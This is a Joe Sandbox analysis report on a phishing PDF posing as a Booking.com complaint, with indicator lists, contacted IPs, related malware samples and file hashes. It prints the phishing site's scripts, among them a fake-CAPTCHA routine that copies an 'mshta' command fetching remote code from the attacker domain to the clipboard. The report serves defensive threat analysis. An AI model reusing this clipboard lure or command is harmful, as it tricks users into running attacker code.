https://mercadoshops.com.co	sets.json.10.dr	false	high
https://gliadomain.com	sets.json.10.dr	false	high
https://poalim.xyz	sets.json.10.dr	false	high
https://mercadolivre.com	sets.json.10.dr	false	high
https://reshim.org	sets.json.10.dr	false	high
https://nourishingpursuits.com	sets.json.10.dr	false	high
https://medonet.pl	sets.json.10.dr	false	high
https://unotv.com	sets.json.10.dr	false	high
https://mercadoshops.com.br	sets.json.10.dr	false	high
https://joyreactor.cc	sets.json.10.dr	false	high
https://zdrowietvn.pl	sets.json.10.dr	false	high
https://johndeere.com	sets.json.10.dr	false	high
https://songstats.com	sets.json.10.dr	false	high
https://baomoi.com	sets.json.10.dr	false	high
https://supereva.it	sets.json.10.dr	false	high
https://elfinancierocr.com	sets.json.10.dr	false	high
https://bolasport.com	sets.json.10.dr	false	high
https://rws1nvtvt.com	sets.json.10.dr	false	high
https://desimartini.com	sets.json.10.dr	false	high
https://hearty.app	sets.json.10.dr	false	high
https://hearty.gift	sets.json.10.dr	false	high
https://mercadoshops.com	sets.json.10.dr	false	high
https://heartymail.com	sets.json.10.dr	false	high
https://nlc.hu	sets.json.10.dr	false	high
https://p106.net	sets.json.10.dr	false	high
https://radio2.be	sets.json.10.dr	false	high
https://finn.no	sets.json.10.dr	false	high
https://hc1.com	sets.json.10.dr	false	high
https://kompas.tv	sets.json.10.dr	false	high
https://mystudentdashboard.com	sets.json.10.dr	false	high
https://songshare.com	sets.json.10.dr	false	high
https://smaker.pl	sets.json.10.dr	false	high
https://mercadopago.com.mx	sets.json.10.dr	false	high
https://p24.hu	sets.json.10.dr	false	high
https://talkdeskqaid.com	sets.json.10.dr	false	high
https://24.hu	sets.json.10.dr	false	high
https://mercadopago.com.pe	sets.json.10.dr	false	high
https://cardsayings.net	sets.json.10.dr	false	high
https://text.com	sets.json.10.dr	false	high
https://www.euronews.com/#xdjl6ew2lzjy06545iav)	shJGPJRkwH.pdf	false	high
https://mightytext.net	sets.json.10.dr	false	high
https://pudelek.pl	sets.json.10.dr	false	high
https://hazipatika.com	sets.json.10.dr	false	high
https://joyreactor.com	sets.json.10.dr	false	high
https://cookreactor.com	sets.json.10.dr	false	high
https://wildixin.com	sets.json.10.dr	false	high
https://eworkbookcloud.com	sets.json.10.dr	false	high
https://cognitiveai.ru	sets.json.10.dr	false	high
https://nacion.com	sets.json.10.dr	false	high
https://chennien.com	sets.json.10.dr	false	high
https://drimer.travel	sets.json.10.dr	false	high
https://deccoria.pl	sets.json.10.dr	false	high
https://mercadopago.cl	sets.json.10.dr	false	high
https://talkdeskstgid.com	sets.json.10.dr	false	high
https://naukri.com	sets.json.10.dr	false	high
https://interia.pl	sets.json.10.dr	false	high
https://bonvivir.com	sets.json.10.dr	false	high
https://carcostadvisor.be	sets.json.10.dr	false	high
https://salemovetravel.com	sets.json.10.dr	false	high
https://sapo.io	sets.json.10.dr	false	high
https://wpext.pl	sets.json.10.dr	false	high
https://welt.de	sets.json.10.dr	false	high
https://poalim.site	sets.json.10.dr	false	high
https://drimer.io	sets.json.10.dr	false	high
https://infoedgeindia.com	sets.json.10.dr	false	high
https://www.aljazeera.com/#oeqr4yqyh9gnk2e889p)	shJGPJRkwH.pdf	false	high
https://blackrockadvisorelite.it	sets.json.10.dr	false	high
https://cognitive-ai.ru	sets.json.10.dr	false	high
https://cafemedia.com	sets.json.10.dr	false	high
https://graziadaily.co.uk	sets.json.10.dr	false	high
https://thirdspace.org.au	sets.json.10.dr	false	high
https://mercadoshops.com.ar	sets.json.10.dr	false	high
https://smpn106jkt.sch.id	sets.json.10.dr	false	high
https://elpais.uy	sets.json.10.dr	false	high
https://landyrev.com	sets.json.10.dr	false	high
https://the42.ie	sets.json.10.dr	false	high
https://commentcamarche.com	sets.json.10.dr	false	high
https://tucarro.com.ve	sets.json.10.dr	false	high
https://edmonton.ctvnews.ca/news-links/#gyny)	shJGPJRkwH.pdf	false	high
https://rws3nvtvt.com	sets.json.10.dr	false	high
https://eleconomista.net	sets.json.10.dr	false	high
https://helpdesk.com	sets.json.10.dr	false	high
https://mercadolivre.com.br	sets.json.10.dr	false	high
https://clmbtech.com	sets.json.10.dr	false	high
https://standardsandpraiserepurpose.com	sets.json.10.dr	false	high
https://07c225f3.online	sets.json.10.dr	false	high
https://salemovefinancial.com	sets.json.10.dr	false	high
https://mercadopago.com.br	sets.json.10.dr	false	high
https://zoom.us	sets.json.10.dr	false	high
https://commentcamarche.net	sets.json.10.dr	false	high
https://etfacademy.it	sets.json.10.dr	false	high
https://mighty-app.appspot.com	sets.json.10.dr	false	high
https://hj.rs	sets.json.10.dr	false	high
https://hearty.me	sets.json.10.dr	false	high
https://mercadolibre.com.gt	sets.json.10.dr	false	high
https://timesinternet.in	sets.json.10.dr	false	high
https://indiatodayne.in	sets.json.10.dr	false	high
https://idbs-staging.com	sets.json.10.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
104.21.94.195	fixecondfirbook.info	United States	13335	CLOUDFLARENETUS	false
18.245.31.53	d2i5gg36g14bzn.cloudfront.net	United States	16509	AMAZON-02US	false
66.63.187.216	clintonmakes.com	United States	8100	ASN-QUADRANET-GLOBALUS	false
23.209.209.135	e8652.dscx.akamaiedge.net	United States	23693	TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
18.245.31.49	unknown	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
186.64.116.70	minedudiser.com	Chile	52368	ZAMLTDACL	false

Private

IP
192.168.2.7
192.168.2.11
192.168.2.10

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592938
Start date and time:	2025-01-16 17:14:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	shJGPJRkwH.pdf renamed because original name is a hash value
Original Sample Name:	71c6dd7199d2355c6d7bee5b2b59367e9661430f66cb5e4a6bd0c2bf287d3cd4.pdf
Detection:	MAL
Classification:	mal84.phis.winPDF@44/75@24/12
Cookbook Comments:	Found application associated with file extension: .pdf Found PDF document URL browsing timeout or error Close Viewer

Errors

Corrupt sample or wrongly selected analyzer.

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.240.205, 18.213.11.84, 50.16.47.176, 54.224.241.105, 34.237.241.83, 162.159.61.3, 172.64.41.3, 2.22.50.131, 2.22.50.144, 2.16.168.105, 2.16.168.107, 142.250.185.163, 142.250.185.110, 74.125.206.84, 216.58.206.78, 142.250.186.174, 216.58.206.67, 142.250.184.195, 172.217.16.202, 142.250.184.234, 142.250.185.106, 142.250.185.202, 142.250.186.74, 142.250.181.234, 172.217.18.10, 142.250.186.106, 142.250.185.170, 216.58.206.42, 142.250.185.74, 142.250.186.170, 142.250.185.234, 216.58.206.74, 142.250.186.42, 142.250.185.138, 216.58.212.170, 142.250.74.202, 216.58.212.138, 172.217.18.106, 172.217.16.206, 142.250.184.206, 142.250.181.238, 172.217.18.99, 142.250.186.78, 34.104.35.123, 216.58.206.46, 172.217.18.14, 184.28.90.27, 52.149.20.212, 23.203.104.175
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, clients2.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, optimizationguide-pa.googleapis.com, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:16:04	API Interceptor	2x Sleep call for process: AcroCEF.exe modified

LLM Input / Output

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown
URL: https://fixecondfirbook.info/captchaHandler.js... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script has a moderate-risk indicator for external data transmission, as it sends the user's IP address to the '/send-ip' endpoint without any transparency or explanation. While this behavior may have a legitimate purpose, such as reCAPTCHA verification, the lack of context and potential privacy implications warrant further review." }
document.addEventListener('DOMContentLoaded', function() { const recaptchaCheckbox = document.querySelector('.recaptcha-checkbox'); if (recaptchaCheckbox) { recaptchaCheckbox.addEventListener('click', function() { // IP- fetch('/send-ip', { method: 'POST' }).then(response => { if (response.ok) { console.log(''); } else { console.error(''); } }); }); } });
URL: https://fixecondfirbook.info/languageRevert.js... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script demonstrates some potentially concerning behaviors, such as preventing the default context menu and disabling keyboard shortcuts for changing the language. While these actions could be part of a legitimate feature, they may also indicate an attempt to restrict user control or prevent certain actions. Additionally, the use of a mutation observer to revert language changes could be an attempt to override user preferences. Overall, the script requires further review to determine the intent and potential impact." }
(function() { function revertLanguageChange() { if (document.documentElement.lang !== originalLang) { document.documentElement.lang = originalLang; } } const originalLang = document.documentElement.lang; const observer = new MutationObserver(revertLanguageChange); observer.observe(document.documentElement, { attributes: true, attributeFilter: ['lang'] }); document.addEventListener('contextmenu', function(event) { event.preventDefault(); }, false); document.addEventListener('keydown', function(event) { if ((event.ctrlKey \|\| event.metaKey) && event.shiftKey && event.key.toLowerCase() === 'l') { event.preventDefault(); } if (event.altKey && event.shiftKey && event.key.toLowerCase() === 'l') { event.preventDefault(); } }, false); })();
URL: https://fixecondfirbook.info/... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The `copyToClipboard()` function generates a command that could be used for malicious purposes, and the script also manipulates the DOM to hide the reCAPTCHA checkbox and display a custom SVG element. These behaviors, combined with the suspicious intent and lack of transparency, indicate a high-risk script that should be further investigated." }
async function copyToClipboard() { var copyText = `mshta ${window.location.origin}/captcha # ''I am not a robot - reCAPTCHA Verification ID: 4345''` try { await navigator.clipboard.writeText(copyText); } catch (error) { } } function someEdit() { document.getElementsByClassName('recaptcha-checkbox')[0].style.display = 'none' document.getElementsByClassName("loadImg")[0].innerHTML = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" style="shape-rendering: auto; display: block; background: transparent;" width="32" height="32" xmlns:xlink="http://www.w3.org/1999/xlink"><g><circle stroke-dasharray="155.50883635269477 53.83627878423159" r="33" stroke-width="12" stroke="#4d90fe" fill="none" cy="50" cx="50"> <animateTransform keyTimes="0;1" values="0 50 50;360 50 50" dur="1.3888888888888888s" repeatCount="indefinite" type="rotate" attributeName="transform"></animateTransform> </circle><g></g></g></svg>` setTimeout(function () { document.getElementsByClassName('sjgdhfgas34')[0].style.display = "block" copyToClipboard() }, 2000) }
URL: https://clintonmakes.com/215c/#mrzltabnxnf1v7h1hxq... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script demonstrates high-risk behavior, including dynamic code execution and data exfiltration. The use of the `window.onerror` event handler to call the `process()` function, which then redirects the user to an external domain, is a strong indicator of malicious intent. Additionally, the obfuscated variable name `a06688` suggests an attempt to conceal the script's purpose. Overall, this script poses a significant security risk and should be treated with caution." }
function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); } async function process() { await sleep(0); if (window.location !== window.parent.location ) { top.location = "http://clintonmakes.com/215c/"; } else { window.location = "http://clintonmakes.com/215c/"; } } a06688= 87; window.onerror = process; process();
URL: PDF document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "A lodger has lodged a concern regarding their past stay at your establishment. The grievance includes mentions about events involving your workforce and living arrangements.", "prominent_button_name": "View Complaint", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://fixecondfirbook.info Model: Joe Sandbox AI	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": true, "third_party_hosting": true, "reasoning": "This appears to be a typosquatting attempt targeting Facebook ('fixecondfirbook' is a manipulated version of 'facebook'). The .info TLD is considered suspicious as it's commonly used in malicious campaigns due to its low cost and fewer registration restrictions. The domain name is deliberately misspelled to trick users." }
URL: https://fixecondfirbook.info
URL: https://fixecondfirbook.info/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: PDF document Model: Joe Sandbox AI	{ "brands": [ "Booking.com" ] }
	{ "brands": [ "Booking.com" ] }
URL: https://fixecondfirbook.info/ Model: Joe Sandbox AI	{ "brands": [ "Booking" ] }
	{ "brands": [ "Booking" ] }
URL: https://fixecondfirbook.info/ Model: Joe Sandbox AI	```json{ "legit_domain": "booking.com", "classification": "wellknown", "reasons": [ "The brand 'Booking' is well-known and is associated with the legitimate domain 'booking.com'.", "The URL 'fixecondfirbook.info' does not match the legitimate domain 'booking.com'.", "The URL contains suspicious elements such as misspellings and unusual domain extension '.info'.", "The domain name 'fixecondfirbook.info' does not have any clear association with the brand 'Booking'.", "The presence of unrelated or misspelled words in the domain name is a common phishing tactic." ], "riskscore": 9} Google indexed: False
URL: fixecondfirbook.info Brands: Booking Input Fields: unknown

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
66.63.187.216	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	clintonmakes.com/favicon.ico
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	clintonmakes.com/favicon.ico
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	clintonmakes.com/favicon.ico
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	swxpeyou.com/favicon.ico
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	edwatsonsmallworks.com/favicon.ico
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	leahbdesign.com/favicon.ico
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	revelsocialclub.com/favicon.ico
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	ritarichards.com/favicon.ico
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	burnalong-info.com/favicon.ico
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse	scaladc.com/favicon.ico
104.21.94.195	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse
	JlZU1N9b8M.pdf	Get hash	malicious	Unknown	Browse
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	ilCvGBnBTU.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
18.245.31.53	ilCvGBnBTU.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	https://page-view-reserved-eng.com/mrzorecf	Get hash	malicious	Unknown	Browse
	https://rinderynitvye.blogspot.com/	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse
	index.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	Reservation Detail Booking.com ID4336.vbs	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse
	http://langtonskilkenny.com/rrUrhf	Get hash	malicious	Unknown	Browse
	https://check-hticompialnt520842.com/sign-in?op_token=6QouodMTj42Y9R6vu7f7F4jkiiAw5e0RnP0YJ7kaakP7NW4bImz7RzENOq9XAroPzLQq7OQtDzJlNnfUSwkvnHQF3HnsYuhEh8y&uuid=3334009b-8512-457f-a8c7-c29303c4adbc&hash=lrio35yeh&language=en	Get hash	malicious	Unknown	Browse
	http://infofunctionboard.autos/	Get hash	malicious	Unknown	Browse
	ROOMING 24034 Period Check-in on July 5th and departure on July 15th, 2024.bat	Get hash	malicious	Unknown	Browse
	https://ennexhorpps.com/apart/book244102ashotxxx22214	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
e8652.dscx.akamaiedge.net	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	2.23.197.184
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	2.23.197.184
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	JlZU1N9b8M.pdf	Get hash	malicious	Unknown	Browse	2.23.197.184
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
fixecondfirbook.info	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.94.195
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	104.21.94.195
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.168.162
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.168.162
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.94.195
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse	104.21.94.195
d2i5gg36g14bzn.cloudfront.net	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.49
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.129
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	ilCvGBnBTU.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.53
	https://page-get-reserves.com/yewhahgt/	Get hash	malicious	Unknown	Browse	18.245.31.18
	https://page-view-reserved-eng.com/mrzorecf	Get hash	malicious	Unknown	Browse	18.245.31.49
	https://page-view-reserved-en.com/erabwasi	Get hash	malicious	Unknown	Browse	18.245.31.18
	https://page-get-reserves.com/nhdkbyzt	Get hash	malicious	Unknown	Browse	18.245.31.129
clintonmakes.com	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	ldr_iZHxN1Dnxf.exe	Get hash	malicious	Unknown	Browse	52.29.50.127
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.49
	ldr_iZHxN1Dnxf.exe	Get hash	malicious	Unknown	Browse	18.195.185.2
	SecurityHealthHost.exe	Get hash	malicious	Stealerium	Browse	45.112.123.224
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.129
	svchost.exe	Get hash	malicious	Stealerium	Browse	45.112.123.224
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	ilCvGBnBTU.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.129
CLOUDFLARENETUS	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	https://www.google.com.vn/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%RANDOM4%wDnNeW8yycT&sa=t&esrc=nNeW8F%RANDOM3%A0xys8Em2FL&source=&cd=tS6T8%RANDOM3%Tiw9XH&cad=XpPkDfJX%RANDOM4%VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkayik.com.au/glyxzb/e7365d2bd9a2e2c8b5587a6a9eb341aa/YXdpbGxpYW1zQGtmb3JjZS5jb20=	Get hash	malicious	Unknown	Browse	104.17.25.14
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.94.195
	https://852u.adj.st/credits-opensea/?sk=288xDmHv&adj_t=wt0ujiy&adj_deep_link=eversheds-sutherlandpago://credits-opensea/?sk=288xDmHv&adj_label=MLM_MP_ML-EMAIL_CC_MARA_AO-UCR_ALL_ACT_X_X_DEFAULT_I-EG-UCR-MUTT-MAR-ABIERTO&adj_fallback=https://iondetox.com.ar/g63c/5617939594/Eversheds-sutherland/?eu=Y2xvemFub0BldmVyc2hlZHMtc3V0aGVybGFuZC5lcw==	Get hash	malicious	Unknown	Browse	188.114.96.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig	Browse	104.21.96.1
	Menu.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.112.1
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	104.21.94.195
	New [V2.2.0].exe	Get hash	malicious	LummaC	Browse	104.21.39.230
	SecurityHealthHost.exe	Get hash	malicious	Stealerium	Browse	104.16.185.241
ASN-QUADRANET-GLOBALUS	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	http://magentacloud.de/s/DeFCB6g8NjbfYpY	Get hash	malicious	Unknown	Browse	23.209.209.135
	celebrationannabirthday.mp4.hta	Get hash	malicious	LummaC	Browse	23.209.209.135
	Infoblatt_Ausnahmesituation.pdf.lnk	Get hash	malicious	LummaC	Browse	23.209.209.135

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	297
Entropy (8bit):	5.210788885337396
Encrypted:	false
SSDEEP:	6:iO+8q2PcNwi2nKuAl9OmbnIFUtUeZmwqSkwOcNwi2nKuAl9OmbjLJ:7+8vLZHAahFUtUe/qS54ZHAaSJ
MD5:	3EAE35F2B63440940FB88A3931DF9198
SHA1:	0BA238EF630A161EDA10C73AFD403CE9C12999C0
SHA-256:	2CB5239AC2C16934EC0120D44209240150652A3777687E5F8EE758FDCF8758A0
SHA-512:	F34A0B969D541704C9AFE3EE8A585638182065DF965F3FCAD1216618BE5FD350A02F0F5CB5409ACFAFBFA1CB66246C2B207239F78B188FC11050F0267CAE0672
Malicious:	false
Reputation:	low
Preview:	2025/01/16-11:15:51.146 280 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/16-11:15:51.149 280 Recovering log #3.2025/01/16-11:15:51.149 280 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.11458514637545
Encrypted:	false
SSDEEP:	48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
MD5:	EE002CB9E51BB8DFA89640A406A1090A
SHA1:	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
SHA-256:	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
SHA-512:	D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
Malicious:	false
Preview:	// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

File type:	PDF document, version 1.4, 10 pages
Entropy (8bit):	7.913766085552636
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	shJGPJRkwH.pdf
File size:	162'654 bytes
MD5:	5d9644d626b822a22090c7544efbd4ec
SHA1:	ffaf93f909c182753d1a8ff01dff2b0739bad162
SHA256:	71c6dd7199d2355c6d7bee5b2b59367e9661430f66cb5e4a6bd0c2bf287d3cd4
SHA512:	b9d089c49535d300e9570af242742d4ef43248e453b01d7f95471dd9805686c7596b85ed04ecaab4c8d8e7168d7f469b6b948f59d495e0e534afa6f6c6915f4c
SSDEEP:	3072:Eibi/T0K7U7fsPrBKOtdjHijSin4mNQAfJ6pTY0CobculhFHQAYcZDc0V+SWfhXv:EibiLjg8djCjBHk/xbH1HQAYasj/
TLSH:	24F3E177C9884CCDF8C3CAF5912A3D8F49ACF35746E4AE12347887967E1090E9A3157A
